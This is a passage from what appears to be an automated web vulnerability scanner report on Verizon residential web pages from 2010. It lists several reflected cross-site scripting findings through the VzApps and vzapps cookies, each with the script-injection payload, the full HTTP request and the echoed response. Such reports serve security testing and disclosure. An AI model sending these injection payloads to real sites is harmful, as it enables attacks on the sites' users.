RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 57963
Expires: Sat, 20 Nov 2010 03:14:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:38 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX640aa<script>alert(1)</script>383bb65ea2f; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX640AA<SCRIPT>ALERT(1)</SCRIPT>383BB65EA2F </DIV>
...[SNIP]...

3.206. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/ [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Installation/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6487d'><script>alert(1)</script>b45a269dda5 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX6487d'><script>alert(1)</script>b45a269dda5; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 57967
Expires: Sat, 20 Nov 2010 03:14:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:23 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX6487d'><script>alert(1)</script>b45a269dda5; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX6487D'><SCRIPT>ALERT(1)</SCRIPT>B45A269DDA5 ' />
...[SNIP]...

3.207. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Installation/Installation.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f5315'><script>alert(1)</script>2c1f456c2c6 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXf5315'><script>alert(1)</script>2c1f456c2c6; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 58000
Expires: Sat, 20 Nov 2010 03:14:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:08 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXf5315'><script>alert(1)</script>2c1f456c2c6; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXF5315'><SCRIPT>ALERT(1)</SCRIPT>2C1F456C2C6 ' />
...[SNIP]...

3.208. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Installation/Installation.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 86aaa<script>alert(1)</script>b944052706a was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX86aaa<script>alert(1)</script>b944052706a; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 57997
Expires: Sat, 20 Nov 2010 03:14:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX86aaa<script>alert(1)</script>b944052706a; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX86AAA<SCRIPT>ALERT(1)</SCRIPT>B944052706A </DIV>
...[SNIP]...

3.209. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e0ce9'><script>alert(1)</script>6ae6011d9f2 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXe0ce9'><script>alert(1)</script>6ae6011d9f2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 58000
Expires: Sat, 20 Nov 2010 00:09:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXe0ce9'><script>alert(1)</script>6ae6011d9f2; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXE0CE9'><SCRIPT>ALERT(1)</SCRIPT>6AE6011D9F2 ' />
...[SNIP]...

3.210. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 1afe5<script>alert(1)</script>103649a90a9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX1afe5<script>alert(1)</script>103649a90a9; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 57996
Expires: Sat, 20 Nov 2010 00:09:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:18 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX1afe5<script>alert(1)</script>103649a90a9; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX1AFE5<SCRIPT>ALERT(1)</SCRIPT>103649A90A9 </DIV>
...[SNIP]...

3.211. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/ [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Plans/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload e1d4d<script>alert(1)</script>f1881c1417d was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Plans/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
